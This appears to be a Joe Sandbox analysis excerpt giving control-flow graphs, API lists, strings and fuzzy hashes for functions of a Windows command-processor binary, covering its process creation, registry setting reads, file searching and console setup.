                                                                                                          control_flow_graph 483 7ff7ab134224-7ff7ab1342a5 InitializeProcThreadAttributeList 484 7ff7ab1342ab-7ff7ab1342e5 UpdateProcThreadAttribute 483->484 485 7ff7ab13ecd4-7ff7ab13ecee GetLastError call 7ff7ab149eec 483->485 487 7ff7ab1342eb-7ff7ab1343c6 memset * 2 GetStartupInfoW call 7ff7ab133a90 call 7ff7ab12b900 484->487 488 7ff7ab13ecf0-7ff7ab13ed19 GetLastError call 7ff7ab149eec DeleteProcThreadAttributeList 484->488 492 7ff7ab13ed1e 485->492 497 7ff7ab134638-7ff7ab134644 _local_unwind 487->497 498 7ff7ab1343cc-7ff7ab1343d3 487->498 488->492 499 7ff7ab134649-7ff7ab134650 497->499 498->499 500 7ff7ab1343d9-7ff7ab1343dc 498->500 499->500 503 7ff7ab134656-7ff7ab13465d 499->503 501 7ff7ab1343de-7ff7ab1343f5 wcsrchr 500->501 502 7ff7ab134415-7ff7ab134424 call 7ff7ab135a68 500->502 501->502 506 7ff7ab1343f7-7ff7ab13440f lstrcmpW 501->506 509 7ff7ab134589-7ff7ab134590 502->509 510 7ff7ab13442a-7ff7ab134486 CreateProcessW 502->510 503->502 505 7ff7ab134663 503->505 505->500 506->502 508 7ff7ab134668-7ff7ab13466d call 7ff7ab149044 506->508 508->502 509->510 514 7ff7ab134596-7ff7ab1345fa CreateProcessAsUserW 509->514 512 7ff7ab13448b-7ff7ab13448f 510->512 515 7ff7ab134672-7ff7ab134682 GetLastError 512->515 516 7ff7ab134495-7ff7ab1344c7 CloseHandle call 7ff7ab13498c 512->516 514->512 518 7ff7ab13468d-7ff7ab134694 515->518 516->518 522 7ff7ab1344cd-7ff7ab1344e5 516->522 520 7ff7ab1346a2-7ff7ab1346ac 518->520 521 7ff7ab134696-7ff7ab1346a0 518->521 523 7ff7ab1346ae-7ff7ab1346b5 call 7ff7ab1397bc 520->523 526 7ff7ab134705-7ff7ab134707 520->526 521->520 521->523 524 7ff7ab1344eb-7ff7ab1344f2 522->524 525 7ff7ab1347a3-7ff7ab1347a9 522->525 541 7ff7ab1346b7-7ff7ab134701 call 7ff7ab17c038 523->541 542 7ff7ab134703 523->542 528 7ff7ab1344f8-7ff7ab134507 524->528 529 7ff7ab1345ff-7ff7ab134607 524->529 526->522 527 7ff7ab13470d-7ff7ab13472a call 7ff7ab12cd90 526->527 543 7ff7ab13473d-7ff7ab134767 call 7ff7ab1313e0 call 7ff7ab149eec call 7ff7ab12ff70 _local_unwind 527->543 544 7ff7ab13472c-7ff7ab134738 _local_unwind 527->544 532 7ff7ab13450d-7ff7ab134553 call 7ff7ab135cb4 call 7ff7ab1333f0 call 7ff7ab13498c 528->532 533 7ff7ab134612-7ff7ab134616 528->533 529->528 534 7ff7ab13460d 529->534 563 7ff7ab134558-7ff7ab13455e 532->563 539 7ff7ab1347d7-7ff7ab1347df 533->539 540 7ff7ab13461c-7ff7ab134633 533->540 538 7ff7ab13476c-7ff7ab134773 534->538 538->528 548 7ff7ab134779-7ff7ab134780 538->548 545 7ff7ab1347e1-7ff7ab1347ed CloseHandle 539->545 546 7ff7ab1347f2-7ff7ab13483c call 7ff7ab12ff70 DeleteProcThreadAttributeList call 7ff7ab138f80 539->546 540->546 541->526 542->526 543->538 544->543 545->546 548->528 553 7ff7ab134786-7ff7ab134789 548->553 553->528 558 7ff7ab13478f-7ff7ab134792 553->558 558->525 559 7ff7ab134794-7ff7ab13479d call 7ff7ab14a250 558->559 559->525 559->528 567 7ff7ab1347ae-7ff7ab1347ca call 7ff7ab1333f0 563->567 568 7ff7ab134564-7ff7ab134579 call 7ff7ab13498c 563->568 567->539 568->546 576 7ff7ab13457f-7ff7ab134584 call 7ff7ab14a920 568->576 576->546
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                          • API String ID: 388421343-2905461000
                                                                                                          • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                          • Instruction ID: 0bd5d1676b3002ff3256b252dd1c5e4af1fdf0ab2083330a296b9113d601642a
                                                                                                          • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                          • Instruction Fuzzy Hash: C8F16332A0A78285E6A6AB19F4507B9F7A4FB49788F824135D94D43774EF3CE448CB20
                                                                                                          Function 00007FF7AB135554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 579 7ff7ab135554-7ff7ab1355b9 call 7ff7ab13a640 582 7ff7ab1355bc-7ff7ab1355e8 RegOpenKeyExW 579->582 583 7ff7ab135887-7ff7ab13588e 582->583 584 7ff7ab1355ee-7ff7ab135631 RegQueryValueExW 582->584 583->582 587 7ff7ab135894-7ff7ab1358db time srand call 7ff7ab138f80 583->587 585 7ff7ab13f248-7ff7ab13f24d 584->585 586 7ff7ab135637-7ff7ab135675 RegQueryValueExW 584->586 591 7ff7ab13f260-7ff7ab13f265 585->591 592 7ff7ab13f24f-7ff7ab13f25b 585->592 588 7ff7ab135677-7ff7ab13567c 586->588 589 7ff7ab13568e-7ff7ab1356cc RegQueryValueExW 586->589 593 7ff7ab13f28b-7ff7ab13f290 588->593 594 7ff7ab135682-7ff7ab135687 588->594 595 7ff7ab1356d2-7ff7ab135710 RegQueryValueExW 589->595 596 7ff7ab13f2b6-7ff7ab13f2bb 589->596 591->586 598 7ff7ab13f26b-7ff7ab13f286 _wtol 591->598 592->586 593->589 599 7ff7ab13f296-7ff7ab13f2b1 _wtol 593->599 594->589 602 7ff7ab135729-7ff7ab135767 RegQueryValueExW 595->602 603 7ff7ab135712-7ff7ab135717 595->603 600 7ff7ab13f2ce-7ff7ab13f2d3 596->600 601 7ff7ab13f2bd-7ff7ab13f2c9 596->601 598->586 599->589 600->595 604 7ff7ab13f2d9-7ff7ab13f2f4 _wtol 600->604 601->595 607 7ff7ab135769-7ff7ab13576e 602->607 608 7ff7ab13579f-7ff7ab1357dd RegQueryValueExW 602->608 605 7ff7ab13f2f9-7ff7ab13f2fe 603->605 606 7ff7ab13571d-7ff7ab135722 603->606 604->595 605->602 609 7ff7ab13f304-7ff7ab13f31a wcstol 605->609 606->602 610 7ff7ab13f320-7ff7ab13f325 607->610 611 7ff7ab135774-7ff7ab13578f 607->611 612 7ff7ab13f3a9 608->612 613 7ff7ab1357e3-7ff7ab1357e8 608->613 609->610 616 7ff7ab13f327-7ff7ab13f33f wcstol 610->616 617 7ff7ab13f34b 610->617 618 7ff7ab13f357-7ff7ab13f35e 611->618 619 7ff7ab135795-7ff7ab135799 611->619 622 7ff7ab13f3b5-7ff7ab13f3b8 612->622 614 7ff7ab1357ee-7ff7ab135809 613->614 615 7ff7ab13f363-7ff7ab13f368 613->615 620 7ff7ab13f39a-7ff7ab13f39d 614->620 621 7ff7ab13580f-7ff7ab135813 614->621 623 7ff7ab13f36a-7ff7ab13f382 wcstol 615->623 624 7ff7ab13f38e 615->624 616->617 617->618 618->608 619->608 619->618 620->612 621->620 625 7ff7ab135819-7ff7ab135823 621->625 626 7ff7ab13f3be-7ff7ab13f3c5 622->626 627 7ff7ab13582c 622->627 623->624 624->620 625->622 628 7ff7ab135829 625->628 630 7ff7ab135832-7ff7ab135870 RegQueryValueExW 626->630 629 7ff7ab13f3ca-7ff7ab13f3d1 627->629 627->630 628->627 631 7ff7ab13f3dd-7ff7ab13f3e2 629->631 630->631 632 7ff7ab135876-7ff7ab135882 RegCloseKey 630->632 633 7ff7ab13f3e4-7ff7ab13f412 ExpandEnvironmentStringsW 631->633 634 7ff7ab13f433-7ff7ab13f439 631->634 632->583 636 7ff7ab13f428 633->636 637 7ff7ab13f414-7ff7ab13f426 call 7ff7ab1313e0 633->637 634->632 635 7ff7ab13f43f-7ff7ab13f44c call 7ff7ab12b900 634->635 635->632 638 7ff7ab13f42e 636->638 637->638 638->634
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                          • API String ID: 145004033-3846321370
                                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction ID: f8a97949ae12ec7b39df0bd14b60bb671d814cd3c4b1620992e8d5cfff4043b8
                                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction Fuzzy Hash: 79E1873651EA82C6E792AB18F49457AF7A0FB88748FC15135E58E03A78EF7CD548CB10
                                                                                                          Function 00007FF7AB1337D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 821 7ff7ab1337d8-7ff7ab133887 GetCurrentThreadId OpenThread call 7ff7ab1304f4 HeapSetInformation RegOpenKeyExW 824 7ff7ab13e9f8-7ff7ab13ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7ab13388d-7ff7ab1338eb call 7ff7ab135920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7ab13ea41-7ff7ab13ea59 GetThreadLocale 824->827 825->827 831 7ff7ab1338f1-7ff7ab133913 memset 825->831 829 7ff7ab13ea5b-7ff7ab13ea67 827->829 830 7ff7ab13ea74-7ff7ab13ea77 827->830 829->830 834 7ff7ab13ea79-7ff7ab13ea7d 830->834 835 7ff7ab13ea94-7ff7ab13ea96 830->835 832 7ff7ab133919-7ff7ab133935 call 7ff7ab134d5c 831->832 833 7ff7ab13eaa5 831->833 841 7ff7ab13393b-7ff7ab133942 832->841 842 7ff7ab13eae2-7ff7ab13eaff call 7ff7ab123240 call 7ff7ab148530 call 7ff7ab134c1c 832->842 838 7ff7ab13eaa8-7ff7ab13eab4 833->838 834->835 837 7ff7ab13ea7f-7ff7ab13ea89 834->837 835->833 837->835 838->832 840 7ff7ab13eaba-7ff7ab13eac3 838->840 843 7ff7ab13eacb-7ff7ab13eace 840->843 845 7ff7ab13eb27-7ff7ab13eb40 _setjmp 841->845 846 7ff7ab133948-7ff7ab133962 _setjmp 841->846 851 7ff7ab13eb00-7ff7ab13eb0d 842->851 847 7ff7ab13ead0-7ff7ab13eadb 843->847 848 7ff7ab13eac5-7ff7ab13eac9 843->848 852 7ff7ab1339fe-7ff7ab133a05 call 7ff7ab134c1c 845->852 853 7ff7ab13eb46-7ff7ab13eb49 845->853 850 7ff7ab133968-7ff7ab13396d 846->850 846->851 847->838 854 7ff7ab13eadd 847->854 848->843 856 7ff7ab1339b9-7ff7ab1339bb 850->856 857 7ff7ab13396f 850->857 866 7ff7ab13eb15-7ff7ab13eb1f call 7ff7ab134c1c 851->866 852->824 859 7ff7ab13eb4b-7ff7ab13eb65 call 7ff7ab123240 call 7ff7ab148530 call 7ff7ab134c1c 853->859 860 7ff7ab13eb66-7ff7ab13eb6f call 7ff7ab1301b8 853->860 854->832 861 7ff7ab1339c1-7ff7ab1339c3 call 7ff7ab134c1c 856->861 862 7ff7ab13eb20 856->862 865 7ff7ab133972-7ff7ab13397d 857->865 859->860 880 7ff7ab13eb87-7ff7ab13eb89 call 7ff7ab1386f0 860->880 881 7ff7ab13eb71-7ff7ab13eb82 _setmode 860->881 877 7ff7ab1339c8 861->877 862->845 873 7ff7ab1339c9-7ff7ab1339de call 7ff7ab12df60 865->873 874 7ff7ab13397f-7ff7ab133984 865->874 866->862 873->866 889 7ff7ab1339e4-7ff7ab1339e8 873->889 874->865 882 7ff7ab133986-7ff7ab1339ae call 7ff7ab130580 GetConsoleOutputCP GetCPInfo call 7ff7ab1304f4 874->882 877->873 890 7ff7ab13eb8e-7ff7ab13ebad call 7ff7ab1358e4 call 7ff7ab12df60 880->890 881->880 898 7ff7ab1339b3 882->898 889->852 893 7ff7ab1339ea-7ff7ab1339ef call 7ff7ab12be00 889->893 902 7ff7ab13ebaf-7ff7ab13ebb3 890->902 899 7ff7ab1339f4-7ff7ab1339fc 893->899 898->856 899->874 902->852 903 7ff7ab13ebb9-7ff7ab13ec24 call 7ff7ab1358e4 GetConsoleOutputCP GetCPInfo call 7ff7ab1304f4 call 7ff7ab12be00 call 7ff7ab130580 GetConsoleOutputCP GetCPInfo call 7ff7ab1304f4 902->903 903->890
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                          • API String ID: 2624720099-1920437939
                                                                                                          • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction ID: 97f1c950924bc66f5b2d8f2f30aa24386a8ff562a316357f0ecf9ee52a76767a
                                                                                                          • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction Fuzzy Hash: 79C1E531E0A7428AF75ABB2CF4505B8FAA0FF4970CF965134D91E476B5EE3CA4488720
                                                                                                          Function 00007FF7AB13823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1118 7ff7ab13823c-7ff7ab13829b FindFirstFileExW 1119 7ff7ab1382cd-7ff7ab1382df 1118->1119 1120 7ff7ab13829d-7ff7ab1382a9 GetLastError 1118->1120 1124 7ff7ab138365-7ff7ab13837b FindNextFileW 1119->1124 1125 7ff7ab1382e5-7ff7ab1382ee 1119->1125 1121 7ff7ab1382af 1120->1121 1122 7ff7ab1382b1-7ff7ab1382cb 1121->1122 1126 7ff7ab13837d-7ff7ab138380 1124->1126 1127 7ff7ab1383d0-7ff7ab1383e5 FindClose 1124->1127 1128 7ff7ab1382f1-7ff7ab1382f4 1125->1128 1126->1119 1129 7ff7ab138386 1126->1129 1127->1128 1130 7ff7ab138329-7ff7ab13832b 1128->1130 1131 7ff7ab1382f6-7ff7ab138300 1128->1131 1129->1120 1130->1121 1134 7ff7ab13832d 1130->1134 1132 7ff7ab138332-7ff7ab138353 GetProcessHeap HeapAlloc 1131->1132 1133 7ff7ab138302-7ff7ab13830e 1131->1133 1137 7ff7ab138356-7ff7ab138363 1132->1137 1135 7ff7ab13838b-7ff7ab1383c2 GetProcessHeap HeapReAlloc 1133->1135 1136 7ff7ab138310-7ff7ab138313 1133->1136 1134->1120 1138 7ff7ab1450f8-7ff7ab14511e GetLastError FindClose 1135->1138 1139 7ff7ab1383c8-7ff7ab1383ce 1135->1139 1140 7ff7ab138327 1136->1140 1141 7ff7ab138315-7ff7ab138323 1136->1141 1137->1136 1138->1122 1139->1137 1140->1130 1141->1140
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 873889042-0
                                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction ID: 1f9a49b581796190981ee41e3aee0d10403fa77d068c9c60447adf6263e3f43a
                                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction Fuzzy Hash: 7C515D36A0AB4686E746AF19F494179FBA1FB49B89F868131CA1E03370DF3CE554C720
                                                                                                          Function 00007FF7AB132978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1142 7ff7ab132978-7ff7ab1329b6 1143 7ff7ab1329b9-7ff7ab1329c1 1142->1143 1143->1143 1144 7ff7ab1329c3-7ff7ab1329c5 1143->1144 1145 7ff7ab1329cb-7ff7ab1329cf 1144->1145 1146 7ff7ab13e441 1144->1146 1147 7ff7ab1329d2-7ff7ab1329da 1145->1147 1148 7ff7ab132a1e-7ff7ab132a3e FindFirstFileW 1147->1148 1149 7ff7ab1329dc-7ff7ab1329e1 1147->1149 1151 7ff7ab13e435-7ff7ab13e439 1148->1151 1152 7ff7ab132a44-7ff7ab132a5c FindClose 1148->1152 1149->1148 1150 7ff7ab1329e3-7ff7ab1329eb 1149->1150 1150->1147 1153 7ff7ab1329ed-7ff7ab132a1c call 7ff7ab138f80 1150->1153 1151->1146 1154 7ff7ab132a62-7ff7ab132a6e 1152->1154 1155 7ff7ab132ae3-7ff7ab132ae5 1152->1155 1159 7ff7ab132a70-7ff7ab132a78 1154->1159 1156 7ff7ab13e3f7-7ff7ab13e3ff 1155->1156 1157 7ff7ab132aeb-7ff7ab132b10 _wcsnicmp 1155->1157 1157->1154 1160 7ff7ab132b16-7ff7ab13e3f1 _wcsicmp 1157->1160 1159->1159 1162 7ff7ab132a7a-7ff7ab132a8d 1159->1162 1160->1154 1160->1156 1162->1146 1163 7ff7ab132a93-7ff7ab132a97 1162->1163 1165 7ff7ab132a9d-7ff7ab132ade memmove call 7ff7ab1313e0 1163->1165 1166 7ff7ab13e404-7ff7ab13e407 1163->1166 1165->1150 1168 7ff7ab13e40b-7ff7ab13e413 1166->1168 1168->1168 1170 7ff7ab13e415-7ff7ab13e42b memmove 1168->1170 1170->1151
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction ID: 349e5c97cd19fec906a0727a699801041d374d93d39797e34afd9b9f34d35c71
                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction Fuzzy Hash: 52512C22B0A68185EAB5BF1DF54427AE650FB447A8FC64230DE6E476F0EF3CE4498350
                                                                                                          Function 00007FF7AB134D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 643 7ff7ab134d5c-7ff7ab134e4b InitializeCriticalSection call 7ff7ab1358e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7ab130580 call 7ff7ab134a14 call 7ff7ab134ad0 call 7ff7ab135554 GetCommandLineW 654 7ff7ab134e4d-7ff7ab134e54 643->654 654->654 655 7ff7ab134e56-7ff7ab134e61 654->655 656 7ff7ab134e67-7ff7ab134e7b call 7ff7ab132e44 655->656 657 7ff7ab1351cf-7ff7ab1351e3 call 7ff7ab123278 call 7ff7ab134c1c 655->657 662 7ff7ab1351ba-7ff7ab1351ce call 7ff7ab123278 call 7ff7ab134c1c 656->662 663 7ff7ab134e81-7ff7ab134ec3 GetCommandLineW call 7ff7ab1313e0 call 7ff7ab12ca40 656->663 662->657 663->662 674 7ff7ab134ec9-7ff7ab134ee8 call 7ff7ab13417c call 7ff7ab132394 663->674 678 7ff7ab134eed-7ff7ab134ef5 674->678 678->678 679 7ff7ab134ef7-7ff7ab134f1f call 7ff7ab12aa54 678->679 682 7ff7ab134f21-7ff7ab134f30 679->682 683 7ff7ab134f95-7ff7ab134fee GetConsoleOutputCP GetCPInfo call 7ff7ab1351ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7ab134f32-7ff7ab134f39 682->684 689 7ff7ab135012-7ff7ab135018 683->689 690 7ff7ab134ff0-7ff7ab135006 GetConsoleTitleW 683->690 684->683 686 7ff7ab134f3b-7ff7ab134f77 call 7ff7ab123278 GetWindowsDirectoryW 684->686 696 7ff7ab134f7d-7ff7ab134f90 call 7ff7ab133c24 686->696 697 7ff7ab1351b1-7ff7ab1351b9 call 7ff7ab134c1c 686->697 692 7ff7ab13507a-7ff7ab13507e 689->692 693 7ff7ab13501a-7ff7ab135024 call 7ff7ab133578 689->693 690->689 691 7ff7ab135008-7ff7ab13500f 690->691 691->689 698 7ff7ab1350eb-7ff7ab135161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff7ab135080-7ff7ab1350b3 call 7ff7ab14b89c call 7ff7ab12586c call 7ff7ab123240 call 7ff7ab133448 692->699 693->692 707 7ff7ab135026-7ff7ab135030 693->707 696->683 697->662 704 7ff7ab13516f 698->704 705 7ff7ab135163-7ff7ab135167 698->705 724 7ff7ab1350d2-7ff7ab1350d7 call 7ff7ab123278 699->724 725 7ff7ab1350b5-7ff7ab1350d0 call 7ff7ab133448 * 2 699->725 706 7ff7ab135172-7ff7ab1351af free call 7ff7ab138f80 704->706 705->704 710 7ff7ab135169-7ff7ab13516d 705->710 712 7ff7ab135032-7ff7ab135059 GetStdHandle GetConsoleScreenBufferInfo 707->712 713 7ff7ab135075 call 7ff7ab14cff0 707->713 710->704 710->706 717 7ff7ab135069-7ff7ab135073 712->717 718 7ff7ab13505b-7ff7ab135067 712->718 713->692 717->692 717->713 718->692 729 7ff7ab1350dc-7ff7ab1350e6 GlobalFree 724->729 725->729 729->698
                                                                                                          APIs
                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134D9A
                                                                                                            • Part of subcall function 00007FF7AB1358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7AB14C6DB), ref: 00007FF7AB1358EF
                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DBB
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DCA
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DE0
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DEE
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E04
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130589
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB13059E
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305AF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB1305C5
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305EF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB130605
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130632
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB130647
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                            • Part of subcall function 00007FF7AB134A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
